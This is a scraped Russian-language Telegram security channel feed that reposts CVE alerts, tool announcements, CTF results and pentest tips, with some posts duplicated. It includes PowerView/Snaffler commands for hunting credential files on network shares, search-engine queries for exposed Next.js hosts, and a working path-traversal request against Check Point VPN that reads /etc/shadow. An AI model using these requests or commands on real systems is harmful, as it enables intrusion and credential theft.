Netflix с 2021 года дефолтное привествие все держит, теперь стало понятно зачем...
"АО «Государственная техническая служба» сообщает, что за первый квартал текущего года с использованием Единого шлюза доступа к Интернету (ЕШДИ) заблокировано свыше 16 млн. кибератак"
Ребята, все понимаю, надо статистику предъявлять чтобы обновлять бюджеты и все эти "Казахстан укрепил позиции по киберготовности", но тупо статистику NGFW публиковать такое себе... Так можно и сканерами мильярд триллионов напушить и говорить ах вах...
Ребята, все понимаю, надо статистику предъявлять чтобы обновлять бюджеты и все эти "Казахстан укрепил позиции по киберготовности", но тупо статистику NGFW публиковать такое себе... Так можно и сканерами мильярд триллионов напушить и говорить ах вах...
Forwarded from b␢code
t.me/username?text=Hello для вставки заготовленного текста в поле ввода сообщения. Нашел этому очень интересное применение, можно деанонить людей которые кликнули на ссылку. Вот пример ссылки. Если вы просто нажмете на него, мне придет уведомление что вы перешли
Так же сделал телеграм бота для создания таких ссылок: @inlinequery_bot
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Похек (Сергей Зыбнев)
OWASP OFFAT
#owasp #API #fuzzing
OFFensive Api Tester - это инструмент для автоматического тестирования API на основе OpenAPI. Он предоставляет возможность автоматически фаззить входные данные и использовать пользовательские данные во время тестов, заданных через конфигурационный файл YAML.
Что тестирует инструмент:
➡️ Restricted HTTP Methods
➡️ SQLi
➡️ BOLA
➡️ Data Exposure
➡️ BOPLA / Mass Assignment
➡️ Broken Access Control
➡️ Basic Command Injection
➡️ Basic XSS/HTML Injection test
Установка:
Использование банальное:
Давно слежу за инструментом, он активно обновляется , но пока ещё в бете.
У инструмента лицензия MIT, так что компании могут свободно его использовать.
А ещё есть готовые докеры)
🧩 Github
🌚 @poxek
#owasp #API #fuzzing
OFFensive Api Tester - это инструмент для автоматического тестирования API на основе OpenAPI. Он предоставляет возможность автоматически фаззить входные данные и использовать пользовательские данные во время тестов, заданных через конфигурационный файл YAML.
Что тестирует инструмент:
Установка:
python -m pip install offat
Использование банальное:
offat -f swagger_file.json
Давно слежу за инструментом, он активно обновляется , но пока ещё в бете.
У инструмента лицензия MIT, так что компании могут свободно его использовать.
А ещё есть готовые докеры)
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Cybred
CVE-2024-2448
RCE в балансировщике LoadMaster, который широко используется в Amazon, Disney, ASOS, и других компаниях.
Ресерч: https://rhinosecuritylabs.com/research/cve-2024-2448-kemp-loadmaster/
RCE в балансировщике LoadMaster, который широко используется в Amazon, Disney, ASOS, и других компаниях.
Ресерч: https://rhinosecuritylabs.com/research/cve-2024-2448-kemp-loadmaster/
🚀 AppSecFest Almaty 2024 пройдет уже в эту пятницу, 3 мая!
👥Встречаемся на Атакент-Экспо 10 павильон. 🤝Еще есть возможность забрать свой билет на сайте www.appsecfest.kz
В программе тебя ждут:
🖥️ Две конф-зоны: App и Sec
🎤 35+ спикеров
💬 Панельные дискуссии с экспертами
👥 500+ участников, объединенных общей целью
🤝 Встреча с ведущими представителями рынка
🎉 Развлекательные активности, уникальные подарки и розыгрыши
Все новости о конференции в телеграм-канале: https://tttttt.me/appsecfest
👥Встречаемся на Атакент-Экспо 10 павильон. 🤝Еще есть возможность забрать свой билет на сайте www.appsecfest.kz
В программе тебя ждут:
🖥️ Две конф-зоны: App и Sec
🎤 35+ спикеров
💬 Панельные дискуссии с экспертами
👥 500+ участников, объединенных общей целью
🤝 Встреча с ведущими представителями рынка
🎉 Развлекательные активности, уникальные подарки и розыгрыши
Все новости о конференции в телеграм-канале: https://tttttt.me/appsecfest
🚨Alert🚨CVE-2024-34351:Next.js Server-Side Request Forgery in Server Actions
🔥PoC: https://www.assetnote.io/resources/research/digging-for-ssrf-in-nextjs-apps#/
⚠A SSRF vulnerability was identified in Next.js Server Actions by security researchers at Assetnote. If the Host header is modified, and the below conditions are also met, an attacker may be able to make requests that appear to be originating from the Next.js application server itself.
📊3.1M+ Services are found on hunter.how
🔗Hunter Link: https://hunter.how/list?searchValue=product.name%3D%22Next.js%22
📰Refer: https://github.com/advisories/GHSA-fr5h-rqp8-mj6g
Hunter:/product.name="Next.js"
FOFA:app="Next.js"
SHODAN:http.component:"Next.js"
#NextJS #SSRF #Vulnerability
🔥PoC: https://www.assetnote.io/resources/research/digging-for-ssrf-in-nextjs-apps#/
⚠A SSRF vulnerability was identified in Next.js Server Actions by security researchers at Assetnote. If the Host header is modified, and the below conditions are also met, an attacker may be able to make requests that appear to be originating from the Next.js application server itself.
📊3.1M+ Services are found on hunter.how
🔗Hunter Link: https://hunter.how/list?searchValue=product.name%3D%22Next.js%22
📰Refer: https://github.com/advisories/GHSA-fr5h-rqp8-mj6g
Hunter:/product.name="Next.js"
FOFA:app="Next.js"
SHODAN:http.component:"Next.js"
#NextJS #SSRF #Vulnerability
www.assetnote.io
Digging for SSRF in NextJS apps
At Assetnote, we encounter sites running NextJS extremely often; in this blog post we will detail some common misconfigurations we find in NextJS websites, along with a vulnerability we found in the framework.
Кто-то будет в восторге конечно от интеграций AI, но суть заключается в том, что они (#Google Gemini Nano) будут боту весь диалог сливать, тот его разбирать и предупреждать Вас что в диалоге есть СКАМ - дичь если честно но смотрю других методов найти не смогли...
https://twitter.com/madebygoogle/status/1790449419684573288
https://twitter.com/madebygoogle/status/1790449419684573288
X (formerly Twitter)
Made by Google (@madebygoogle) on X
We're testing a new feature that uses Gemini Nano to provide real-time alerts during a call if it detects conversation patterns commonly associated with scams. This protection all happens on-device so your conversation stays private to you. More to come later…
Microsoft #PatchTuesday #05.2024
с исправлениями 61 уязвимости, в том числе двух активно используемых или публично раскрытых 0-day, а также лишь одну критическую RCE в
Microsoft SharePoint Server
(CVE-2024-30044, CVSS 8.8)
Обновляйтесь вовремя господа...
с исправлениями 61 уязвимости, в том числе двух активно используемых или публично раскрытых 0-day, а также лишь одну критическую RCE в
Microsoft SharePoint Server
(CVE-2024-30044, CVSS 8.8)
Обновляйтесь вовремя господа...
Forwarded from Proxy Bar
CVE-2024-32002 GIT RCE
*
Удаленное выполнение кода в подмодулях Git.
Payload может быть активирован через рекурсивное клонирование репозитория Git.
*
POC exploit
#git #rce
*
Удаленное выполнение кода в подмодулях Git.
Payload может быть активирован через рекурсивное клонирование репозитория Git.
*
POC exploit
#git #rce
Forwarded from Proxy Bar
Forwarded from Standoff 13
Основной этап кибербитвы Standoff 13 завершен! 😮
Победитель:Государство F
Счет по реализованным государственным критическим событиям такой:
• в Государстве S — 42
• в Государстве F — 41
💡 Одна из команд Государства F завершила битву с нулевым значением в столбцах «Государственные критические события», «Реализованные критические события» и «Выявленные уязвимости».
Итоги основного этапа определялись по среднему количеству реализованных государственных критических событий среди всех активных команд одного государства.
Итоговые результаты:
• Государство S — 3,23
• Государство F — 3,42
Четыре команды, которые выходят в плей-офф:
• DreamTeam
• ℭ𝔲𝔩𝔱
• DeteAct × SPbCTF
• GISCYBERTEAM
Четыре команды, которые выходят в плей-ин:
• True0xA3
• RHTxF13xSHD
• Jet_Infosystems
• Wetox
За три дня кибербитвы команды защиты:
• Расследовали 114 атак
• Предотвратили 84 критических события
• Обнаружили 689 инцидентов
Завтра начнется борьба за общий призовой фонд в 15 млн рублей!
Победитель:
Счет по реализованным государственным критическим событиям такой:
• в Государстве S — 42
• в Государстве F — 41
💡 Одна из команд Государства F завершила битву с нулевым значением в столбцах «Государственные критические события», «Реализованные критические события» и «Выявленные уязвимости».
Итоги основного этапа определялись по среднему количеству реализованных государственных критических событий среди всех активных команд одного государства.
Итоговые результаты:
• Государство S — 3,23
• Государство F — 3,42
Четыре команды, которые выходят в плей-офф:
• DreamTeam
• ℭ𝔲𝔩𝔱
• DeteAct × SPbCTF
• GISCYBERTEAM
Четыре команды, которые выходят в плей-ин:
• True0xA3
• RHTxF13xSHD
• Jet_Infosystems
• Wetox
За три дня кибербитвы команды защиты:
• Расследовали 114 атак
• Предотвратили 84 критических события
• Обнаружили 689 инцидентов
Завтра начнется борьба за общий призовой фонд в 15 млн рублей!
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from One brick to the IT world
Снова собрались казахи, русские и украинцы в одну команду, на этот раз в DreamTeam и выиграли очередной Standoff.
Механика была спорная, но я не сомневаюсь, что каждый участник DreamTeam был достоен победы.
Ждем в следующий раз старую или улучшенную механику, который обеспечит fair-play от начала до конца мероприятия.
#standoff
Механика была спорная, но я не сомневаюсь, что каждый участник DreamTeam был достоен победы.
Ждем в следующий раз старую или улучшенную механику, который обеспечит fair-play от начала до конца мероприятия.
#standoff
Forwarded from Хатка бобра
#recon #shares #post
Иногда что-нибудь ценное можно найти на шарах (файлы с кредами, персональные данные, какие-то пруфы реализации целей пентеста), для этих целей можно использовать скрапперы:
PowerView:
Либо Snaffler (C#) (https://github.com/SnaffCon/Snaffler)
Python: https://github.com/blacklanternsecurity/MANSPIDER
Оба умеют искать и по названию файлов, и по содержимому.
С точки зрения OpSec это шумно - куча коннектов и попыток аутентификации на все шары в сети, а потому такой подход пойдет, когда нет задачи скрываться.
Более скрытный вариант использования - это запускать инструменты для локального поиска файлов. С точки зрения событий это будет просто поиск файлов в системе.
Ссылки:
- https://www.thehacker.recipes/ad/movement/credentials/dumping/network-shares
- Порт снаффлера на питон https://github.com/asmtlab/snafflepy
Иногда что-нибудь ценное можно найти на шарах (файлы с кредами, персональные данные, какие-то пруфы реализации целей пентеста), для этих целей можно использовать скрапперы:
PowerView:
Find-InterestingDomainShareFile -Include *.doc*, *.xls*, *.csv, *.ppt*
Либо Snaffler (C#) (https://github.com/SnaffCon/Snaffler)
Python: https://github.com/blacklanternsecurity/MANSPIDER
Оба умеют искать и по названию файлов, и по содержимому.
С точки зрения OpSec это шумно - куча коннектов и попыток аутентификации на все шары в сети, а потому такой подход пойдет, когда нет задачи скрываться.
Более скрытный вариант использования - это запускать инструменты для локального поиска файлов. С точки зрения событий это будет просто поиск файлов в системе.
./Snaffler.exe -i C:\ -s
Ссылки:
- https://www.thehacker.recipes/ad/movement/credentials/dumping/network-shares
- Порт снаффлера на питон https://github.com/asmtlab/snafflepy
GitHub
GitHub - SnaffCon/Snaffler: a tool for pentesters to help find delicious candy, by @l0ss and @Sh3r4 ( Twitter: @/mikeloss and @/sh3r4_hax…
a tool for pentesters to help find delicious candy, by @l0ss and @Sh3r4 ( Twitter: @/mikeloss and @/sh3r4_hax ) - SnaffCon/Snaffler
1 рабочая нагрузка метепретера в стеганографии, прям интересно стало...
https://x.com/anyrun_app/status/1795817134842384542?s=46
https://x.com/anyrun_app/status/1795817134842384542?s=46
X (formerly Twitter)
ANY.RUN (@anyrun_app) on X
🎯 #Meterpreter #backdoor uses tricky #steganography by filtering image channels in yet another #stegocampaign
🕵 A .NET executable file with a #PowerShell script inside downloads a PNG image from a remote C2 server
📝 #Malware calculates a byte array from…
🕵 A .NET executable file with a #PowerShell script inside downloads a PNG image from a remote C2 server
📝 #Malware calculates a byte array from…
Check Point выпустила экстренное исправление для VPN нулевого дня, используемой в атаках #CVE-2024-24919 CVSS 3.X 7.5
https://vulmon.com/vulnerabilitydetails?qid=CVE-2024-24919
https://nvd.nist.gov/vuln/detail/CVE-2024-24919
https://www.bleepingcomputer.com/news/security/check-point-releases-emergency-fix-for-vpn-zero-day-exploited-in-attacks/
Check Point Remote Access VPN 0-Day
FOFA link
POC:
https://vulmon.com/vulnerabilitydetails?qid=CVE-2024-24919
https://nvd.nist.gov/vuln/detail/CVE-2024-24919
https://www.bleepingcomputer.com/news/security/check-point-releases-emergency-fix-for-vpn-zero-day-exploited-in-attacks/
Check Point Remote Access VPN 0-Day
FOFA link
POC:
POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39
aCSHELL/../../../../../../../etc/shadow
BleepingComputer
Check Point releases emergency fix for VPN zero-day exploited in attacks
Check Point has released hotfixes for a VPN zero-day vulnerability exploited in attacks to gain remote access to firewalls and attempt to breach corporate networks.